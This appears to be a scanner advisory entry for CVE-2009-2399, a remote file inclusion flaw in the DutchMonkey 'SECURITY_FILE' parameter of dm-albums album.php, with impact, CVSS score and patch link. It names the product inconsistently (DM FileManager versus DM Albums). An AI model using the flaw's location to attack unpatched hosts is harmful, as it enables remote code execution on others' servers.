Summary
The host is running DM FileManager and is prone to remote File Inclusion vulnerability.
Impact
Successful exploitation will let the remote attacker execute arbitrary PHP code, and can include arbitrary file from local or external resources when register_globals is enabled.
Impact Level: Application
Solution
Apply Security patch from below link,
http://www.dutchmonkey.com/?file=products/dm-albums/download_form.html
Insight
Error exists when input passed to the 'SECURITY_FILE' parameter in 'album.php' in 'dm-albums/template/' directory is not properly verified before being used to include files.
Affected
DutchMonkey, DM FileManager version 3.9.4 and prior
References
Updated on 2017-03-28
Severity
Classification
-
CVE CVE-2009-2399 -
CVSS Base Score: 6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
Related Vulnerabilities
- 2532|Gigs Directory Traversal And SQL Injection Multiple Vulnerabilities
- 1024 CMS 1.1.0 Beta 'force_download.php' Local File Include Vulnerability
- Advanced Image Hosting Cross Site Scripting Vulnerability
- Aker Secure Mail Gateway Cross-Site Scripting Vulnerability
- Adobe ColdFusion Unspecified Information Disclosure Vulnerability